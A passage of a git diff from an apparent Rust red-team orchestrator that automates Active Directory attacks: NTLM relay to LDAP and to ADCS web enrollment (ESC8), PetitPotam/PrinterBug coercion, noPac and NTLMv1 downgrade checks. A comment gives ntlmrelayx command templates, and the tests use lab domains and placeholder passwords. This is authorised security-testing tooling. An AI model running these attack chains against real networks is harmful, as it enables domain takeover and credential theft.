state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_nopac_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "nopac:contoso.local:192.168.58.10"); + } + + #[test] + fn collect_skips_dominated_domain() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.dominated_domains.insert("contoso.local".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_no_matching_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Credential for different domain, noPac requires exact domain match + state.credentials.push(make_cred("admin", "fabrikam.local")); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_NOPAC, "nopac:contoso.local:192.168.58.10".into()); + let work = collect_nopac_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = 
collect_nopac_work(&state);
+        assert_eq!(work.len(), 2);
+    }
+
+    #[test]
+    fn collect_case_insensitive_domain_match() {
+        let mut state = StateInner::new("test".into());
+        state
+            .domain_controllers
+            .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+        state.credentials.push(make_cred("admin", "contoso.local"));
+        let work = collect_nopac_work(&state);
+        assert_eq!(work.len(), 1);
+    }
+
+    #[test]
+    fn domain_matching_for_credential_selection() {
+        let cred_contoso = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+
+        let cred_fabrikam = ares_core::models::Credential {
+            id: "c2".into(),
+            username: "fabadmin".into(),
+            password: "FabPass!".into(), // pragma: allowlist secret
+            domain: "fabrikam.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+
+        let creds = [cred_contoso, cred_fabrikam];
+        let target_domain = "fabrikam.local";
+
+        let matched = creds
+            .iter()
+            .find(|c| c.domain.to_lowercase() == target_domain.to_lowercase());
+        assert!(matched.is_some());
+        assert_eq!(matched.unwrap().username, "fabadmin");
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/ntlm_relay.rs b/ares-cli/src/orchestrator/automation/ntlm_relay.rs
new file mode 100644
index 00000000..75e57b1b
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/ntlm_relay.rs
@@ -0,0 +1,850 @@
+//! auto_ntlm_relay -- orchestrate NTLM relay attacks when conditions are met.
+//!
+//! NTLM relay requires two sides: a relay listener (ntlmrelayx) and a coercion
+//! trigger (PetitPotam, PrinterBug, scheduled task bots). This module dispatches
+//! relay attacks when:
+//!
+//! 1. SMB signing is disabled on a target (relay destination)
+//! 2. An ADCS web enrollment endpoint exists (ESC8 relay target)
+//! 3. We have credentials to trigger coercion or a known coercion source
+//!
+//! The worker agent coordinates ntlmrelayx + coercion within a single task.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Dedup key prefix for relay attacks.
+const DEDUP_SET: &str = DEDUP_NTLM_RELAY;
+
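+// Editor's note -- for orientation only: the worker-side "coercion" task is
+// expected to pair a relay listener with a coercion trigger. Roughly (exact
+// tooling and flags are the worker's concern; treat these as assumptions):
+//
+//   relay:   ntlmrelayx.py -t <relay_target> ...
+//   ESC8:    ntlmrelayx.py -t http://<ca_host>/certsrv/certfnsh.asp --adcs
+//   trigger: PetitPotam/PrinterBug against <coercion_source>, pointed at
+//            <listener_ip>
+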
+/// Monitors for NTLM relay opportunities and dispatches relay attacks.
+/// Interval: 30s.
+pub async fn auto_ntlm_relay(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(30));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("ntlm_relay") {
+            continue;
+        }
+
+        let listener = match dispatcher.config.listener_ip.as_deref() {
+            Some(ip) => ip.to_string(),
+            None => continue,
+        };
+
+        let work: Vec<RelayWork> = {
+            let state = dispatcher.state.read().await;
+            collect_relay_work(&state, &listener)
+        };
+
+        for item in work {
+            let payload = match &item.relay_type {
+                RelayType::SmbToLdap => json!({
+                    "technique": "ntlm_relay_ldap",
+                    "relay_target": item.relay_target,
+                    "listener_ip": item.listener,
+                    "coercion_source": item.coercion_source,
+                    "credential": {
+                        "username": item.credential.username,
+                        "password": item.credential.password,
+                        "domain": item.credential.domain,
+                    },
+                }),
+                RelayType::Esc8 { ca_name, domain } => json!({
+                    "technique": "ntlm_relay_adcs",
+                    "relay_target": item.relay_target,
+                    "listener_ip": item.listener,
+                    "ca_name": ca_name,
+                    "domain": domain,
+                    "coercion_source": item.coercion_source,
+                    "credential": {
+                        "username": item.credential.username,
+                        "password": item.credential.password,
+                        "domain": item.credential.domain,
+                    },
+                }),
+            };
+
+            let priority = dispatcher.effective_priority("ntlm_relay");
+            match dispatcher
+                .throttled_submit("coercion", "coercion", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        relay_target = %item.relay_target,
+                        relay_type = %item.relay_type,
+                        "NTLM relay attack dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_SET, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_SET, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(relay = %item.relay_target, "NTLM relay task deferred by throttler");
+                }
+                Err(e) => {
+                    warn!(err = %e, relay = %item.relay_target, "Failed to dispatch NTLM relay");
+                }
+            }
+        }
+    }
+}
+
+/// Collect relay work items from current state.
+///
+/// Pure logic extracted from `auto_ntlm_relay` so it can be unit-tested without
+/// needing a `Dispatcher` or async runtime (beyond state construction).
+fn collect_relay_work(
+    state: &crate::orchestrator::state::StateInner,
+    listener: &str,
+) -> Vec<RelayWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    // Path 1: Relay to hosts with SMB signing disabled → LDAP shadow creds / RBCD
+    for vuln in state.discovered_vulnerabilities.values() {
+        if vuln.vuln_type.to_lowercase() != "smb_signing_disabled" {
+            continue;
+        }
+        if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+            continue;
+        }
+
+        let target_ip = vuln
+            .details
+            .get("target_ip")
+            .or_else(|| vuln.details.get("ip"))
+            .and_then(|v| v.as_str())
+            .unwrap_or(&vuln.target);
+
+        if target_ip.is_empty() {
+            continue;
+        }
+
+        let relay_key = format!("smb_relay:{target_ip}");
+        if state.is_processed(DEDUP_SET, &relay_key) {
+            continue;
+        }
+
+        let coercion_source = find_coercion_source(&state.domain_controllers, |ip| {
+            state.is_processed(DEDUP_COERCED_DCS, ip)
+        });
+
+        let cred = match state.credentials.first() {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        items.push(RelayWork {
+            dedup_key: relay_key,
+            relay_type: RelayType::SmbToLdap,
+            relay_target: target_ip.to_string(),
+            coercion_source,
+            listener: listener.to_string(),
+            credential: cred,
+        });
+    }
+
+    // Path 2: Relay to ADCS web enrollment (ESC8)
+    for vuln in state.discovered_vulnerabilities.values() {
+        let vtype = vuln.vuln_type.to_lowercase();
+        if vtype != "esc8" && vtype != "adcs_web_enrollment" {
+            continue;
+        }
+        if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+            continue;
+        }
+
+        let ca_host = vuln
+            .details
+            .get("ca_host")
+            .or_else(|| vuln.details.get("target_ip"))
+            .and_then(|v| v.as_str())
+            .unwrap_or(&vuln.target);
+
+        if ca_host.is_empty() {
+            continue;
+        }
+
+        let relay_key = format!("esc8_relay:{ca_host}");
+        if state.is_processed(DEDUP_SET, &relay_key) {
+            continue;
+        }
+
+        let coercion_source = find_coercion_source(&state.domain_controllers, |ip| {
+            state.is_processed(DEDUP_COERCED_DCS, ip)
+        });
+
+        let cred = match state.credentials.first() {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        let ca_name = vuln
+            .details
+            .get("ca_name")
+            .and_then(|v| v.as_str())
+            .unwrap_or("")
+            .to_string();
+
+        let domain = vuln
+            .details
+            .get("domain")
+            .and_then(|v| v.as_str())
+            .unwrap_or("")
+            .to_string();
+
+        items.push(RelayWork {
+            dedup_key: relay_key,
+            relay_type: RelayType::Esc8 { ca_name, domain },
+            relay_target: ca_host.to_string(),
+            coercion_source,
+            listener: listener.to_string(),
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Find the best coercion source (a DC IP we can PetitPotam/PrinterBug).
+///
+/// Takes the domain_controllers map and a closure to check dedup state,
+/// keeping us decoupled from `StateInner`'s module visibility.
+fn find_coercion_source(
+    domain_controllers: &std::collections::HashMap<String, String>,
+    is_processed: impl Fn(&str) -> bool,
+) -> Option<String> {
+    // Prefer a DC we haven't already coerced
+    domain_controllers
+        .values()
+        .find(|ip| !is_processed(ip))
+        .or_else(|| domain_controllers.values().next())
+        .cloned()
+}
+
+struct RelayWork {
+    dedup_key: String,
+    relay_type: RelayType,
+    relay_target: String,
+    coercion_source: Option<String>,
+    listener: String,
+    credential: ares_core::models::Credential,
+}
+
+enum RelayType {
+    SmbToLdap,
+    Esc8 { ca_name: String, domain: String },
+}
+
+impl std::fmt::Display for RelayType {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::SmbToLdap => write!(f, "smb_to_ldap"),
+            Self::Esc8 { ..
} => write!(f, "esc8_adcs"), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use std::collections::HashMap; + + #[test] + fn relay_type_display() { + assert_eq!(RelayType::SmbToLdap.to_string(), "smb_to_ldap"); + assert_eq!( + RelayType::Esc8 { + ca_name: "CA".into(), + domain: "contoso.local".into() + } + .to_string(), + "esc8_adcs" + ); + } + + #[test] + fn dedup_key_format_smb() { + let key = format!("smb_relay:{}", "192.168.58.22"); + assert_eq!(key, "smb_relay:192.168.58.22"); + } + + #[test] + fn dedup_key_format_esc8() { + let key = format!("esc8_relay:{}", "192.168.58.10"); + assert_eq!(key, "esc8_relay:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SET, "ntlm_relay"); + } + + #[test] + fn find_coercion_source_prefers_unprocessed() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + dcs.insert("fabrikam.local".into(), "192.168.58.20".into()); + + // First DC already processed, second not + let result = find_coercion_source(&dcs, |ip| ip == "192.168.58.10"); + assert!(result.is_some()); + assert_eq!(result.unwrap(), "192.168.58.20"); + } + + #[test] + fn find_coercion_source_falls_back_to_any() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + + // All processed, still returns one + let result = find_coercion_source(&dcs, |_| true); + assert!(result.is_some()); + assert_eq!(result.unwrap(), "192.168.58.10"); + } + + #[test] + fn find_coercion_source_empty_map() { + let dcs = HashMap::new(); + let result = find_coercion_source(&dcs, |_| false); + assert!(result.is_none()); + } + + #[test] + fn esc8_vuln_type_matching() { + let types = ["esc8", "adcs_web_enrollment", "ESC8", "ADCS_WEB_ENROLLMENT"]; + for t in &types { + let vtype = t.to_lowercase(); + assert!( + vtype == "esc8" || vtype == "adcs_web_enrollment", + "{t} should match" + ); + } + } + + #[test] + fn smb_signing_vuln_type_matching() { + let vtype = "smb_signing_disabled".to_lowercase(); + assert_eq!(vtype, "smb_signing_disabled"); + + let not_smb = "mssql_access".to_lowercase(); + assert_ne!(not_smb, "smb_signing_disabled"); + } + + #[test] + fn relay_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = RelayWork { + dedup_key: "smb_relay:192.168.58.22".into(), + relay_type: RelayType::SmbToLdap, + relay_target: "192.168.58.22".into(), + coercion_source: Some("192.168.58.10".into()), + listener: "192.168.58.100".into(), + credential: cred.clone(), + }; + assert_eq!(work.relay_target, "192.168.58.22"); + assert_eq!(work.listener, "192.168.58.100"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn smb_to_ldap_payload_structure() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ntlm_relay_ldap", + "relay_target": "192.168.58.22", + "listener_ip": "192.168.58.100", + "coercion_source": "192.168.58.10", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + 
assert_eq!(payload["technique"], "ntlm_relay_ldap"); + assert_eq!(payload["relay_target"], "192.168.58.22"); + assert_eq!(payload["listener_ip"], "192.168.58.100"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn esc8_payload_structure() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let relay_type = RelayType::Esc8 { + ca_name: "contoso-CA".into(), + domain: "contoso.local".into(), + }; + let payload = json!({ + "technique": "ntlm_relay_adcs", + "relay_target": "192.168.58.10", + "listener_ip": "192.168.58.100", + "ca_name": "contoso-CA", + "domain": "contoso.local", + "coercion_source": "192.168.58.20", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "ntlm_relay_adcs"); + assert_eq!(payload["ca_name"], "contoso-CA"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(relay_type.to_string(), "esc8_adcs"); + } + + #[test] + fn target_ip_extraction_from_vuln_details() { + let details = serde_json::json!({"target_ip": "192.168.58.22", "ip": "192.168.58.23"}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.22"); + } + + #[test] + fn target_ip_fallback_to_ip_field() { + let details = serde_json::json!({"ip": "192.168.58.23"}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.23"); + } + + #[test] + fn target_ip_fallback_to_vuln_target() { + let details = serde_json::json!({}); + let fallback = "192.168.58.99"; + let target = details + .get("target_ip") + .or_else(|| details.get("ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.99"); + } + + #[test] + fn ca_host_extraction_fallback() { + let details = serde_json::json!({"ca_host": "192.168.58.10"}); + let fallback = "192.168.58.99"; + let ca_host = details + .get("ca_host") + .or_else(|| details.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(ca_host, "192.168.58.10"); + + let details2 = serde_json::json!({"target_ip": "192.168.58.20"}); + let ca_host2 = details2 + .get("ca_host") + .or_else(|| details2.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(ca_host2, "192.168.58.20"); + } + + #[test] + fn ca_name_extraction() { + let details = serde_json::json!({"ca_name": "contoso-CA"}); + let ca_name = details + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(ca_name, "contoso-CA"); + + let details2 = serde_json::json!({}); + let ca_name2 = details2 + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(ca_name2, ""); + } + + #[test] + fn find_coercion_source_all_unprocessed() { + let mut dcs = HashMap::new(); + dcs.insert("contoso.local".into(), "192.168.58.10".into()); + dcs.insert("fabrikam.local".into(), "192.168.58.20".into()); + + let result = find_coercion_source(&dcs, |_| false); + assert!(result.is_some()); + } + + 
#[test] + fn relay_type_display_exhaustive() { + let smb = RelayType::SmbToLdap; + assert_eq!(format!("{smb}"), "smb_to_ldap"); + + let esc8 = RelayType::Esc8 { + ca_name: String::new(), + domain: String::new(), + }; + assert_eq!(format!("{esc8}"), "esc8_adcs"); + } + + // --- collect_relay_work integration tests --- + + use crate::orchestrator::state::SharedState; + + fn make_cred() -> ares_core::models::Credential { + ares_core::models::Credential { + id: "c1".into(), + username: "svcadmin".into(), + password: "S3cure!Pass".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "kerberoast".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_smb_vuln(id: &str, target_ip: &str) -> ares_core::models::VulnerabilityInfo { + let mut details = HashMap::new(); + details.insert( + "target_ip".to_string(), + serde_json::Value::String(target_ip.to_string()), + ); + ares_core::models::VulnerabilityInfo { + vuln_id: id.to_string(), + vuln_type: "smb_signing_disabled".to_string(), + target: target_ip.to_string(), + discovered_by: "scanner".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 5, + } + } + + fn make_esc8_vuln( + id: &str, + ca_host: &str, + ca_name: &str, + domain: &str, + ) -> ares_core::models::VulnerabilityInfo { + let mut details = HashMap::new(); + details.insert( + "ca_host".to_string(), + serde_json::Value::String(ca_host.to_string()), + ); + details.insert( + "ca_name".to_string(), + serde_json::Value::String(ca_name.to_string()), + ); + details.insert( + "domain".to_string(), + serde_json::Value::String(domain.to_string()), + ); + ares_core::models::VulnerabilityInfo { + vuln_id: id.to_string(), + vuln_type: "esc8".to_string(), + target: ca_host.to_string(), + discovered_by: "scanner".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 8, + } + } + + #[tokio::test] + async fn collect_relay_work_empty_state() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "empty state should produce no work"); + } + + #[tokio::test] + async fn collect_relay_work_no_credentials() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "no credentials should produce no work"); + } + + #[tokio::test] + async fn collect_relay_work_smb_signing_disabled() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "smb_relay:192.168.58.22"); + assert_eq!(work[0].relay_target, "192.168.58.22"); + assert_eq!(work[0].listener, "192.168.58.100"); + assert!(matches!(work[0].relay_type, RelayType::SmbToLdap)); + assert_eq!(work[0].coercion_source, Some("192.168.58.10".into())); + assert_eq!(work[0].credential.username, "svcadmin"); + } + + #[tokio::test] + 
async fn collect_relay_work_esc8_vuln() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities.insert( + "v2".into(), + make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "esc8_relay:192.168.58.30"); + assert_eq!(work[0].relay_target, "192.168.58.30"); + match &work[0].relay_type { + RelayType::Esc8 { ca_name, domain } => { + assert_eq!(ca_name, "contoso-CA"); + assert_eq!(domain, "contoso.local"); + } + _ => panic!("expected Esc8 relay type"), + } + // No DCs configured → coercion_source is None + assert!(work[0].coercion_source.is_none()); + } + + #[tokio::test] + async fn collect_relay_work_skips_already_processed_dedup() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + // Mark the relay key as already processed + s.mark_processed(DEDUP_SET, "smb_relay:192.168.58.22".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!( + work.is_empty(), + "already-processed dedup key should be skipped" + ); + } + + #[tokio::test] + async fn collect_relay_work_skips_exploited_vulns() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.exploited_vulnerabilities.insert("v1".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "exploited vulns should be skipped"); + } + + #[tokio::test] + async fn collect_relay_work_multiple_vulns() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.discovered_vulnerabilities + .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23")); + s.discovered_vulnerabilities.insert( + "v3".into(), + make_esc8_vuln("v3", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 3, "should produce work for all 3 vulns"); + + let smb_count = work + .iter() + .filter(|w| matches!(w.relay_type, RelayType::SmbToLdap)) + .count(); + let esc8_count = work + .iter() + .filter(|w| matches!(w.relay_type, RelayType::Esc8 { .. 
})) + .count(); + assert_eq!(smb_count, 2); + assert_eq!(esc8_count, 1); + } + + #[tokio::test] + async fn collect_relay_work_ignores_unrelated_vuln_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + // Add an unrelated vuln type + let mut details = HashMap::new(); + details.insert( + "target_ip".to_string(), + serde_json::Value::String("192.168.58.40".to_string()), + ); + s.discovered_vulnerabilities.insert( + "v_unrelated".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "v_unrelated".into(), + vuln_type: "mssql_impersonation".into(), + target: "192.168.58.40".into(), + discovered_by: "scanner".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 3, + }, + ); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!( + work.is_empty(), + "unrelated vuln types should not produce work" + ); + } + + #[tokio::test] + async fn collect_relay_work_esc8_already_processed() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities.insert( + "v2".into(), + make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"), + ); + s.mark_processed(DEDUP_SET, "esc8_relay:192.168.58.30".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert!(work.is_empty(), "already-processed esc8 should be skipped"); + } + + #[tokio::test] + async fn collect_relay_work_mixed_exploited_and_fresh() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.discovered_vulnerabilities + .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23")); + // Only v1 is exploited + s.exploited_vulnerabilities.insert("v1".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].relay_target, "192.168.58.23"); + } + + #[tokio::test] + async fn collect_relay_work_coercion_source_prefers_uncoerced_dc() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.credentials.push(make_cred()); + s.discovered_vulnerabilities + .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22")); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Mark first DC as already coerced + s.mark_processed(DEDUP_COERCED_DCS, "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_relay_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!( + work[0].coercion_source, + Some("192.168.58.20".into()), + "should prefer the uncoerced DC" + ); + } +} diff --git a/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs new file mode 100644 index 00000000..a89c9a77 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs @@ -0,0 +1,382 @@ +//! auto_ntlmv1_downgrade -- detect DCs allowing NTLMv1 authentication. +//! +//! When a DC accepts NTLMv1 (LmCompatibilityLevel < 3), attackers can +//! downgrade auth to capture NTLMv1 hashes via Responder/MITM, which are +//! 
trivially crackable. This module dispatches a check per DC.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect NTLMv1 downgrade work items from state (pure logic, no async).
+fn collect_ntlmv1_work(state: &StateInner) -> Vec<NtlmV1Work> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for (domain, dc_ip) in &state.all_domains_with_dcs() {
+        let dedup_key = format!("ntlmv1:{}", dc_ip);
+        if state.is_processed(DEDUP_NTLMV1_DOWNGRADE, &dedup_key) {
+            continue;
+        }
+
+        let cred = match state
+            .credentials
+            .iter()
+            .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+            .or_else(|| state.credentials.first())
+        {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        items.push(NtlmV1Work {
+            dedup_key,
+            domain: domain.clone(),
+            dc_ip: dc_ip.clone(),
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Checks each DC for NTLMv1 downgrade vulnerability.
+/// Interval: 45s.
+pub async fn auto_ntlmv1_downgrade(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("ntlmv1_downgrade") {
+            continue;
+        }
+
+        let work: Vec<NtlmV1Work> = {
+            let state = dispatcher.state.read().await;
+            collect_ntlmv1_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "ntlmv1_downgrade_check",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("ntlmv1_downgrade");
+            match dispatcher
+                .throttled_submit("recon", "recon", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        domain = %item.domain,
+                        dc = %item.dc_ip,
+                        "NTLMv1 downgrade check dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_NTLMV1_DOWNGRADE, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_NTLMV1_DOWNGRADE, &item.dedup_key)
+                        .await;
+
+                    // Register ntlmv1_downgrade vulnerability proactively so it
+                    // appears in reports without waiting for the agent's
+                    // report_finding callback (which only logs).
+                    let vuln = ares_core::models::VulnerabilityInfo {
+                        vuln_id: format!("ntlmv1_{}", item.dc_ip.replace('.', "_")),
+                        vuln_type: "ntlmv1_downgrade".to_string(),
+                        target: item.dc_ip.clone(),
+                        discovered_by: "auto_ntlmv1_downgrade".to_string(),
+                        discovered_at: chrono::Utc::now(),
+                        details: {
+                            let mut d = std::collections::HashMap::new();
+                            d.insert("target_ip".to_string(), json!(item.dc_ip));
+                            d.insert("domain".to_string(), json!(item.domain));
+                            d.insert(
+                                "description".to_string(),
+                                json!("DC allows NTLMv1 authentication (LmCompatibilityLevel < 3).
